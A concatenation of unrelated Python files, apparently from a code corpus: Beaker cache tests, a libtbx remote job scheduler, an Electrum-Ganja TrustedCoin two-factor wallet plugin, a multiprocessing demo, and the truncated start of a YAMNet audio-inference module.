assert 'test' in cache
assert cache.has_key('fred')
cache.clear()
assert not cache.has_key("test")
def test_has_key_multicache(self):
cache = Cache('test', **self.CACHE_ARGS)
o = object()
cache.set_value("test", o)
assert cache.has_key("test")
assert "test" in cache
cache = Cache('test', **self.CACHE_ARGS)
assert cache.has_key("test")
def test_unicode_keys(self):
cache = Cache('test', **self.CACHE_ARGS)
o = object()
cache.set_value(u_('hiŏ'), o)
assert u_('hiŏ') in cache
assert u_('hŏa') not in cache
cache.remove_value(u_('hiŏ'))
assert u_('hiŏ') not in cache
def test_long_unicode_keys(self):
cache = Cache('test', **self.CACHE_ARGS)
o = object()
long_str = u_(
'Очень длинная строка, которая не влезает в сто двадцать восемь байт и поэтому не проходит ограничение в check_key, что очень прискорбно, не правда ли, друзья? Давайте же скорее исправим это досадное недоразумение!'
)
cache.set_value(long_str, o)
assert long_str in cache
cache.remove_value(long_str)
assert long_str not in cache
def test_spaces_in_unicode_keys(self):
cache = Cache('test', **self.CACHE_ARGS)
o = object()
cache.set_value(u_('hi ŏ'), o)
assert u_('hi ŏ') in cache
assert u_('hŏa') not in cache
cache.remove_value(u_('hi ŏ'))
assert u_('hi ŏ') not in cache
def test_spaces_in_keys(self):
cache = Cache('test', **self.CACHE_ARGS)
cache.set_value("has space", 24)
assert cache.has_key("has space")
assert 24 == cache.get_value("has space")
cache.set_value("hasspace", 42)
assert cache.has_key("hasspace")
assert 42 == cache.get_value("hasspace")
def test_increment(self):
app = WebTestApp(CacheMiddleware(self.simple_app))
res = app.get('/', extra_environ={'beaker.clear': True})
assert 'current value is: 1' in res
res = app.get('/')
assert 'current value is: 2' in res
res = app.get('/')
assert 'current value is: 3' in res
app = WebTestApp(CacheMiddleware(self.simple_app))
res = app.get('/', extra_environ={'beaker.clear': True})
assert 'current value is: 1' in res
res = app.get('/')
assert 'current value is: 2' in res
res = app.get('/')
assert 'current value is: 3' in res
def test_cache_manager(self):
app = WebTestApp(CacheMiddleware(self.cache_manager_app))
res = app.get('/')
assert 'test_key is: test value' in res
assert 'test_key cleared' in res
def test_store_none(self):
app = WebTestApp(CacheMiddleware(self.using_none_app))
res = app.get('/', extra_environ={'beaker.clear': True})
assert 'current value is: 10' in res
res = app.get('/')
assert 'current value is: None' in res
def test_expiretime(self):
cache = Cache('test', **self.CACHE_ARGS)
cache.set_value("has space", 24, expiretime=1)
assert cache.has_key("has space")
time.sleep(1.1)
assert not cache.has_key("has space")
def test_expiretime_automatic(self):
if not self.SUPPORTS_EXPIRATION:
self.skipTest('NamespaceManager does not support automatic expiration')
cache = Cache('test', **self.CACHE_ARGS)
cache.set_value("has space", 24, expiretime=1)
assert cache.namespace.has_key("has space")
time.sleep(1.1)
assert not cache.namespace.has_key("has space")
def test_createfunc(self):
cache = Cache('test', **self.CACHE_ARGS)
def createfunc():
createfunc.count += 1
return createfunc.count
createfunc.count = 0
def keepitlocked():
lock = cache.namespace.get_creation_lock('test')
lock.acquire()
keepitlocked.acquired = True
time.sleep(1.0)
lock.release()
keepitlocked.acquired = False
v0 = cache.get_value('test', createfunc=createfunc)
self.assertEqual(v0, 1)
v0 = cache.get_value('test', createfunc=createfunc)
self.assertEqual(v0, 1)
cache.remove_value('test')
begin = datetime.datetime.utcnow()
t = threading.Thread(target=keepitlocked)
t.start()
while not keepitlocked.acquired:
# Wait for the thread that should lock the cache to start.
time.sleep(0.001)
v0 = cache.get_value('test', createfunc=createfunc)
self.assertEqual(v0, 2)
# Ensure that the `get_value` was blocked by the concurrent thread.
assert datetime.datetime.utcnow() - begin > datetime.timedelta(seconds=1)
t.join()
|
remote.py
|
from __future__ import absolute_import, division, print_function
from libtbx.queuing_system_utils import communication
from six.moves import cPickle as pickle
import threading
from six.moves import queue
import time
class SchedulerActor(object):
"""
Interface to a scheduling.Manager object that is polled by another thread
"""
def __init__(self, manager, waittime):
self.manager = manager
self.waittime = waittime
self.jobs_in = queue.Queue()
self.jobs_out = queue.Queue()
self.identifier_for = {}
self.active = True
self.daemon = threading.Thread( target = self.run )
self.daemon.daemon = True
self.daemon.start()
def run(self):
while self.active:
self.manager.poll()
while self.manager.completed_results:
current = self.manager.completed_results[0]
assert current.identifier in self.identifier_for
try:
self.jobs_out.put(
( self.identifier_for[ current.identifier ], current ),
block = False,
)
except queue.Full:
break
self.manager.completed_results.popleft()
del self.identifier_for[ current.identifier ]
while True:
try:
( identifier, ( target, args, kwargs ) ) = self.jobs_in.get( block = False )
except queue.Empty:
break
i = self.manager.submit( target = target, args = args, kwargs = kwargs )
assert i not in self.identifier_for
self.identifier_for[ i ] = identifier
if not self.manager.completed_results:
time.sleep( self.waittime )
self.manager.join()
for result in self.manager.results:
assert result.identifier in self.identifier_for
self.jobs_out.put( ( self.identifier_for[ result.identifier ], result ) )
del self.identifier_for[ result.identifier ]
def shutdown(self):
self.active = False
self.daemon.join()
class SubmitJobs(communication.Command):
"""
Request for job submission
"""
def __init__(self, job_infos):
self.job_infos = job_infos
def process(self, environment):
for ( identifier, callparms ) in self.job_infos:
environment.jobs_in.put( ( identifier, callparms ) )
class GetJobs(communication.Command):
def process(self, environment):
jobs = []
while True:
try:
jres = environment.jobs_out.get( block = False )
except queue.Empty:
break
jobs.append( jres )
return jobs
class SchedulerServer(communication.Server):
"""
Server-side component
"""
def __init__(self, instream, outstream, manager, waittime = 0.1):
super( SchedulerServer, self ).__init__(
instream = instream,
outstream = outstream,
environment = SchedulerActor( manager = manager, waittime = waittime ),
)
class SchedulerClient(communication.Client):
"""
Client-side connection to a potentially remote SchedulerServer
"""
def __init__(self, instream, outstream, waittime = 1, submittime = 0.5, poolsize = 4):
super(SchedulerClient, self).__init__(
instream = instream,
outstream = outstream,
)
self.running = set()
self.result_for = {}
self.waiting = []
self.waittime = waittime
self.submittime = submittime
self.polltime = time.time() # assume queue is empty
self.enqueuetime = self.polltime
self.poolsize = poolsize
def is_known(self, identifier):
return identifier in self.running or identifier in self.result_for
def submit(self, identifier, target, args, kwargs):
assert not self.is_known( identifier = identifier )
if not self.waiting:
self.enqueuetime = time.time()
self.waiting.append( ( identifier, ( target, args, kwargs ) ) )
self.running.add( identifier )
self.poll()
def is_alive(self, identifier):
self.poll()
return identifier not in self.result_for
def get_result(self, identifier):
return self.result_for[ identifier ]
def remove(self, identifier):
del self.result_for[ identifier ]
def poll(self):
now = time.time()
if self.running and ( self.waittime < ( now - self.polltime ) or now < self.polltime ):
response = self.send( command = GetJobs() )
jobs = response()
for ( identifier, value ) in jobs:
assert identifier in self.running
self.running.remove( identifier )
assert identifier not in self.result_for
self.result_for[ identifier ] = value
now = time.time()
self.polltime = now
if (
( self.poolsize <= len( self.waiting ) )
or ( self.waiting
and ( self.submittime < ( now - self.enqueuetime ) or now < self.enqueuetime )
)
):
response = self.send( command = SubmitJobs( job_infos = self.waiting ) )
try:
response()
except Exception as e:
raise RuntimeError("Submission failure: %s" % e)
self.waiting = []
def Job(self, target, args = (), kwargs = {}):
return Job(
handler = self,
target = target,
args = args,
kwargs = kwargs,
)
class PreSubmissionStatus(object):
"""
A job that has not been submitted yet
"""
@staticmethod
def start(job):
job.handler.submit(
identifier = job.name,
target = job.target,
args = job.args,
kwargs = job.kwargs,
)
job.status = RunningStatus
@staticmethod
def is_alive(job):
raise RuntimeError("job has not been submitted yet")
class RunningStatus(object):
"""
A job that has been submitted
"""
@staticmethod
def start(job):
raise RuntimeError("start called second time")
@staticmethod
def is_alive(job):
alive = job.handler.is_alive( identifier = job.name )
if not alive:
job.result = job.handler.get_result( identifier = job.name )
job.handler.remove( identifier = job.name )
job.status = FinishedStatus
return alive
class FinishedStatus(object):
"""
A job that has been submitted
"""
@staticmethod
def start(job):
raise RuntimeError("start called second time")
@staticmethod
def is_alive(job):
return False
class Job(object):
"""
Job object to execute function calls on remote machines accessible via
a network channel
Restrictions: target, args and kwargs has to be pickleable
"""
def __init__(self, handler, target, args = (), kwargs = {}):
self.handler = handler
self.target = target
self.args = args
self.kwargs = kwargs
self.status = PreSubmissionStatus
self.result = None
self.exitcode = 0
@property
def name(self):
return "remote_job_%d" % id( self )
def start(self):
self.status.start( job = self )
def is_alive(self):
return self.status.is_alive( job = self )
def join(self):
while self.is_alive():
time.sleep( 0.1 )
def __str__(self):
return "%s(name = '%s')" % ( self.__class__.__name__, self.name )
class RemoteFactory(object):
"""
Remote instance method factory. There is no check that the instance has
a method passed along with the constructor
"""
def __init__(self, calculation, method):
from libtbx.object_oriented_patterns import lazy_initialization
self.instance = lazy_initialization( func = calculation )
self.method = method
def __call__(self, *args, **kwargs):
return getattr( self.instance(), self.method )( *args, **kwargs )
def object_to_argument(obj):
return pickle.dumps( obj, 0 )
def argument_to_object(arg):
return pickle.loads( arg.decode( "string-escape" ) )
def command_merge(cmdline):
return "%s %r %r %s" % cmdline
def command_unmerge(cmdline):
return cmdline
def server_process_command_line(
job_factory,
queue_factory,
executable = "libtbx.remote_processing",
folder = ".",
transformation = command_merge,
):
return transformation(
cmdline = (
executable,
object_to_argument( obj = job_factory ),
object_to_argument( obj = queue_factory ),
"--folder=%s" % folder,
),
)
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum-Ganja - Lightweight Ganjacoin Client
# Copyright (C) 2015 Thomas Voegtlin
# Copyright (C) 2018 GanjaProject
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import socket
import os
import requests
import json
from urllib.parse import urljoin
from urllib.parse import quote
import electrum_ganja as electrum
from electrum_ganja import ganja, ecc
from electrum_ganja import constants
from electrum_ganja import keystore
from electrum_ganja.ganja import *
from electrum_ganja.mnemonic import Mnemonic
from electrum_ganja import version
from electrum_ganja.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum_ganja.i18n import _
from electrum_ganja.plugins import BasePlugin, hook
from electrum_ganja.util import NotEnoughFunds
from electrum_ganja.storage import STO_EV_USER_PW
# signing_xpub is hardcoded so that the wallet can be restored from seed, without TrustedCoin's server
def get_signing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
else:
return "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
SEED_PREFIX = version.SEED_PREFIX_2FA
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
pass
class TrustedCoinCosignerClient(object):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
def send_request(self, method, relative_url, data=None):
kwargs = {'headers': {}}
if self.user_agent:
kwargs['headers']['user-agent'] = self.user_agent
if method == 'get' and data:
kwargs['params'] = data
elif method == 'post' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['content-type'] = 'application/json'
url = urljoin(self.base_url, relative_url)
if self.debug:
print('%s %s %s' % (method, url, data))
try:
response = requests.request(method, url, **kwargs)
except Exception as e:
raise ErrorConnectingServer(e)
if self.debug:
print(response.text)
if response.status_code != 200:
message = str(response.text)
if response.headers.get('content-type') == 'application/json':
r = response.json()
if 'message' in r:
message = r['message']
raise TrustedCoinException(message, response.status_code)
if response.headers.get('content-type') == 'application/json':
return response.json()
else:
return response.text
def get_terms_of_service(self, billing_plan='electrum-ganja-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-ganja-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum-Ganja/" + version.ELECTRUM_GANJA_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self.auth_code = None
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
assert price <= 100000 * n
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address']
fee_output = (TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.print_error("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def sign_transaction(self, tx, password):
Multisig_Wallet.sign_transaction(self, tx, password)
if tx.is_complete():
return
self.plugin.prompt_user_for_otp(self, tx)
if not self.auth_code:
self.print_error("sign_transaction: no auth code")
return
long_user_id, short_id = self.get_user_id()
tx_dict = tx.as_dict()
raw_tx = tx_dict["hex"]
r = server.sign(short_id, raw_tx, self.auth_code)
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.print_error("twofactor: is complete", tx.is_complete())
# reset billing_info
self.billing_info = None
self.auth_code = None
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return ganja.sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s):
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK2, c2 = ganja._CKD_pub(cK, c, s)
return ganja.serialize_xpub(version, c2, cK2)
def make_billing_address(wallet, num):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK, c = ganja.CKD_pub(cK, c, num)
return ganja.public_key_to_p2pkh(cK)
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
return ganja.is_new_seed(seed, SEED_PREFIX)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
if wallet.billing_info is None:
assert wallet.can_sign_without_server()
return None
address = wallet.billing_info['billing_address']
for _type, addr, amount in tx.outputs():
if _type == TYPE_ADDRESS and addr == address:
return address, amount
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet):
if wallet.can_sign_without_server():
return
self.print_error("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
self.print_error('cannot connect to TrustedCoin server: {}'.format(e))
return
billing_address = make_billing_address(wallet, billing_info['billing_index'])
assert billing_address == billing_info['billing_address']
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self):
return Mnemonic('english').make_seed(seed_type='2fa', num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(DISCLAIMER), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('create_seed', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def create_seed(self, wizard):
seed = self.make_seed()
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, passphrase, derivation):
from electrum_ganja.mnemonic import Mnemonic
from electrum_ganja.keystore import bip32_root, bip32_private_derivation
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
xprv, xpub = bip32_root(bip32_seed, 'standard')
xprv, xpub = bip32_private_derivation(xprv, "m/", derivation)
return xprv, xpub
@classmethod
def xkeys_from_seed(self, seed, passphrase):
words = seed.split()
n = len(words)
# old version use long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
assert passphrase == ''
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), '', "m/")
elif n==12:
xprv1, xpub1 = self.get_xkeys(seed, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.storage.set_keystore_encryption(bool(password))
if encrypt_storage:
wizard.storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.storage.put('x1/', k1.dump())
wizard.storage.put('x2/', k2.dump())
wizard.storage.write()
msg = [
_("Your wallet file is: {}.").format(os.path.abspath(wizard.storage.path)),
_("You need to be online in order to complete the creation of "
"your wallet. If you generated your seed on an offline "
'computer, click on "{}" to close this window, move your '
"wallet file to an online computer, and reopen it with "
"Electrum-Ganja.").format(_('Cancel')),
_('If you are online, click on "{}" to continue.').format(_('Next'))
]
msg = '\n\n'.join(msg)
wizard.stack = []
wizard.confirm_dialog(title='', message=msg, run_next = lambda x: wizard.run('create_remote_key'))
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard, seed, passphrase):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
storage = wizard.storage
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
storage.put('x1/', k1.dump())
storage.put('x2/', k2.dump())
long_user_id, short_id = get_user_id(storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
k3 = keystore.from_xpub(xpub3)
storage.put('x3/', k3.dump())
storage.set_keystore_encryption(bool(password))
if encrypt_storage:
storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.wallet = Wallet_2fa(storage)
wizard.create_addresses()
def create_remote_key(self, wizard):
email = self.accept_terms_of_use(wizard)
xpub1 = wizard.storage.get('x1/')['xpub']
xpub2 = wizard.storage.get('x2/')['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except socket.error:
wizard.show_message('Server not reachable, aborting')
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
try:
assert _id == short_id, ("user id error", _id, short_id)
assert xpub3 == _xpub3, ("xpub3 error", xpub3, _xpub3)
except Exception as e:
wizard.show_message(str(e))
return
self.check_otp(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3):
otp, reset = self.request_otp_dialog(wizard, short_id, otp_secret)
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except:
wizard.show_message(_('Incorrect password'))
return
k3 = keystore.from_xpub(xpub3)
wizard.storage.put('x3/', k3.dump())
wizard.storage.put('use_trustedcoin', True)
wizard.storage.write()
wizard.wallet = Wallet_2fa(wizard.storage)
wizard.run('create_addresses')
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
try:
assert xpub1 == wizard.storage.get('x1/')['xpub']
assert xpub2 == wizard.storage.get('x2/')['xpub']
except:
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
_, _, _, _, c, k = deserialize_xprv(xprv)
pk = bip32_private_key([0, 0], k, c)
key = ecc.ECPrivkey(pk)
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.check_otp(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'create_remote_key'
|
1.py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 8 16:33:31 2020
@author: lenovouser
"""
import multiprocessing as mp
def job(q):
res = 0
for i in range(1000):
res += i+i**2+i**3
q.put(res) # queue
if __name__ == '__main__':
q = mp.Queue()
p1 = mp.Process(target=job, args=(q,))
p2 = mp.Process(target=job, args=(q,))
p1.start()
p2.start()
p1.join()
p2.join()
res1 = q.get()
res2 = q.get()
print(res1+res2)
|
tf_yamnet.py
|
from __future__ import annotations
from datetime import datetime
import logging
import threading
import time
import zipfile
from typing import Sequence
import numpy as np
import tensorflow as tf
import audiosegment as ad
from sklearn.preprocessing import minmax_scale
from .BaseSystem import BaseSystem
logger = logging.getLogger(__name__)
class BaseTfYamnetSystem(BaseSystem):
audio_sample_width: int = 2
model_path: str = None
model: tf.lite.Interpreter = None
model_sample_rate: int = 16000 # The model required audio sample rate.
model_labels: Sequence[str] = None
raw_audio_buffer = b""
raw_audio_utc_begin: datetime = None
running: bool = False
inference_thread: threading.Thread = None
sleep: bool = True
inference_max_fps: float = 10.0
def shutdown(self):
self.running = False
if self.inference_thread is not None:
self.inference_thread.join()
def run(self):
self.inference_thread = threading.Thread(
target=self.__class__.run_inference_thread, args=(self,)
)
self.inference_thread.start()
def _recv_audio_data(self, event_type, audio_event) -> None:
self.raw_audio_utc_begin = audio_event.begin_timestamp
audio_seg = ad.from_numpy_array(audio_event.data, framerate=audio_event.rate)
# resample the audio to rate needed by the model.
resampled_audio_seg = audio_seg.resample(
sample_rate_Hz=16000, sample_width=self.audio_sample_width, channels=1
)
if self.raw_audio_buffer is None:
self.raw_audio_buffer = resampled_audio_seg.seg.raw_data
else:
temp = self.raw_audio_buffer + resampled_audio_seg.seg.raw_data
self.raw_audio_buffer = temp[
-self.model_sample_rate * self.audio_sample_width :
] # Only keep the most recent second of audio.
class TfYamnetLiteSystem(BaseTfYamnetSystem):
"""
